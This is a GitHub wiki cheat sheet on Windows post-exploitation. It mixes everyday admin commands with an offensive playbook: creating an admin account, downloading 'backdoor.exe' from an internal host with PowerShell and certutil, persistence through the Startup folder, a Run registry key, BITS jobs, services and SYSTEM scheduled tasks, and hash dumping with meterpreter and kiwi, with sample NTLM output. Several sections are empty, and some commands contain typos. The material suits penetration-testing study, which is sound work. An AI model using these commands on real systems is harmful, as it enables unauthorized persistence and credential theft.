post exploit windows - dvanmosselbeen/security-cheat-sheet GitHub Wiki

Windows Post Exploit

Table of Contents

Information Gathering

System

Command Description and/or Reason
tasklist Used to list all processes.
taskkill Used to kill a process.
sfc /scennow Scan system files for errors.
driverquery Return a list of drivers. For example driverquery -v will return verbose information of all drivers installed on your system.
fc File compare. diff is way more useful than fc.
powercfg To manage and track your power usage (electric consumption). Some useful usages are: powercfg /a, powercfg hibernate on, powercfg hibernate off, powercfg /devicequery s1_supported. powercfg /lastwake will show you what devices last woke up your computer. Useful if you computer wake up for unknown reasons. This needs to be done with a (cmd) console that has been launched with admin rights. For this, right click on the Command prompt shortcut and select Run as administrator.
powercfg/energy This will create a (html) statistics page of the energy usage, very interesting for laptops. Needs also to be run as administrator in a shell.
powercfg /batteryreport Same as above, but then an battery report.
shutdown shutdown /r /o will restart your computer and launches the Advanced Start Options menu, this is where you can access the Safe Mode and the Windows recovery utilities. This is very handy when you are troubleshooting some issues.
systeminfo Returns a bunch of interesting system information. Use systeminfo /s followed by the host name of a computer on your local network, to remotely grab the information for that system. This may require additional syntax elements for the domain, user name, and password, like this: systeminfo /s [host_name] /u [domain]\[user_name] /p [user_password]
assoc Returns a list with the curent file associations. For example, assoc .txt will show you to which type txt belongs too. assoc .txt= will change the file association for text files to whatever program you enter after the equal sign.
clip The clipboard for command use. This program is very useful if you want to get the output of a program pasted in your clipboard. You need to pipe stuff to the clip program to be able to use it. For example: systeminfo <PIPE_CHARACTER> clip. Which will send the output of the command systeminfo in your clipboard. So now you can paste that somewhere else. The PIPE_CHARACTER character gets eaten by the Markdown markup language i use and the pipe character is the only character we can't escape with Markdown. Sorry for that. It's the character that you can get by pressing alt+124.
pkgmgr /iu:"TelnetClient" To install the TelnetClient. pkgmgr is deprecated on Windows 10, use dism instead.
cipher cipher is used to permanently delete files that where already deleted. So that they can't be recovered anymore with special recovery software. You should be aware that when you delete files, these files aren't deleted, but the reference is. The used space by the old files are then marked as being free space, and is then eventually allocated to future new data and thus the old data will then be eventually overwritten. As long as the system doesn't overwrite the old data, then the old data can be easily recovered. The cipher command wipes a directory by writing some random data to it, in the hope that the old data can't be recovered. It still can be recovered but way more harder and with another type of recovery tools. cipher doesn't delete files that "still exist" (which reference still exist in the FAT, File Allocation Table). For example, cipher /w:c will wipe free space on the C: drive, without deleting existing data.

Network

Command Description and/or Reason
ipconfig /all Give informations about the network.
ipconfig /release Release it's ip, if in dhcp mode.
ipconfig /renew Renew it's ip, if in dhcp mode.
ipconfig /flushdns Flush the dns cache.
hostname Get hostname.
ping <hostname or ip> Say hello to another computer.
tracert To trace and follow your network connection.
pathping <hostname or ip> A tools which use and combine the best parts of ping and tracert.
getmac To get your MAC address of your network cards.
arp Address Resolution Cache, most common usage is arp -a.
nslookup <hostname> Used for checking DNS record entries.
nbtstat Diagnostic tool for troubleshooting NetBIOS issues.
net Used for managing users, services, shares etc.
route Manipulates network routing tables.
netstat Display information about tcp and udp connections and ports. See netstat -an.

User Accounts

Command Description and/or Reason
net user <username> <password> /add Create a new user on the system.
net localgroup Administrators <username> /add Add a user to the group administrators.
net localgroup Administrators Check who belongs to the administrators group.

Obtain user's information

...

Credentials

...

Configs

...

Finding Important Files

...

Other Utilities

...

Covering Your Tracks

...

Avoiding history filesmys

...

Deleting and Destroying

...

Escalating

...

Looking for possible opened paths

...

Delivery methods

See also the upload command in msfconsole.

With powershell:

Invoke-WebRequest http://10.x.x.x/backdoor.exe

With certutils:

certutil -urlcache -split -f http://10.x.x.x/backdoor.exe

Maintaining control

See also other ways of keeping persistence.

  • Using scheduled tasks
  • Creating another user
  • Backdooring RDP
  • Reverse shell

Windows Startup folder

C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

With the registry

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\USERNAME\AppData\Roaming\backdoor.exe"

Using BITS

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows. Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Create the job:

bitsadmin /create backdoor

Add the file for the job that will be transferred:

bitsadmin /SetNotifyCmdLine 1 cmd.exe "/c bitsadmin.exe /complete backdoor | start /B C:\Users\USERNAME\Documents\backdoor.exe"

Execute the backdoor:

bitsadmin /SetMinRetryDelay 1 cmd "/c bitsadmin.exe /ccomplete backdoor | start /B C:\Users\USERNAME\Documents\backdoor.exe"

Set it persistent with a retry delay of 30:

bitsadmin /SetMinRetryDelay bacckdoor 30

Start/resume the job:

bitsadmin /resume backdoor

By creating a dedicated service

In PowerShell:

New-Service -Name "<SERVICE_NAME>" -BinaryPathName "<PATH_TO_BINARY>" -Description "<SERVICE_DESCRIPTION>" -StartupType "Boot"

Note: The service is stopped, but by checking the services options in the GUI you can notice that the service will start automatically.

Scheduled Tasks

Scheduled tasks are used to schedule the launch of specific programs or scripts at a pre-defined time or when it meets a condition (Ex: a user logs in).

Powershell can be used to create a scheduled task and assure persistence but for that, we'll have to define multiple cmdlets. These are:

  • New-ScheduledTaskAction - Is used to define the action that is going to be made.
  • New-ScheduledTaskTrigger - Defining the trigger (daily/weekly/monthly, etc). The trigger can be considered a condition that when met the scheduled task will launch the action.
  • New-ScheduledTaskPrincipal - Is the user that the task will be run as.
  • New-ScheduledTaskSettingsSet - This will set our above-mentioned settings.
  • Register-ScheduledTask - Will create the task.

Knowing this let's create the task using Powershell.

PS > $A = ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Administrator\Desktop\backdoor.exe"
PS > $B = New-ScheduledTaskTrigger -AtLogOn
PS > $C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY\SYSTEM" -RunLevel Highhest
PS > $D = New-ScheduledTaskSettingsSet
PS > $E = New-ScheduledTask -Action $A -Trigger $B  -Principal $C -Settings $D
PS > Register-ScheduledTask Backdoor -InputObject $E

Reverse Shell

See the dedicated document: Reverse Shell

Execute a Remote Script

...

Hash Dumping

There are different techniques to obtain the hashes of the users on a Windows system.

Note that you need to be system user. This will not work even if you have Administrator rights. So we probably first need to migrate the process to NT AUTHORITY\SYSTEM.

Technique 1:

Note that the hash is in column 4.

meterpreter > run post/windows/gather/hashdump 

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 31066436b67d1dfb03c9f249b9aed099...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:52745740e9a05e6195731194f03865ea:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
joe:1000:aad3b435b51404eeaad3b435b51404ee:878d8014606cda29677a44efa1353fc7:::
chris:1001:aad3b435b51404eeaad3b435b51404ee:e0b6050c7280bf4a7bee599cf374fd80:::
tryhackme:1002:aad3b435b51404eeaad3b435b51404ee:0c7ba4684821cd349e327896d9db4474:::

Technique 2

We can dump credentials using kiwi, which is the equivalent of mimikatz. To do that you'll need to load the module: load kiwi.

The command used to dump the SAM database hashes is: lsa_dump_sam

Resources

Peace & Love © All Rights Reserved on that

⚠️ **GitHub.com Fallback** ⚠️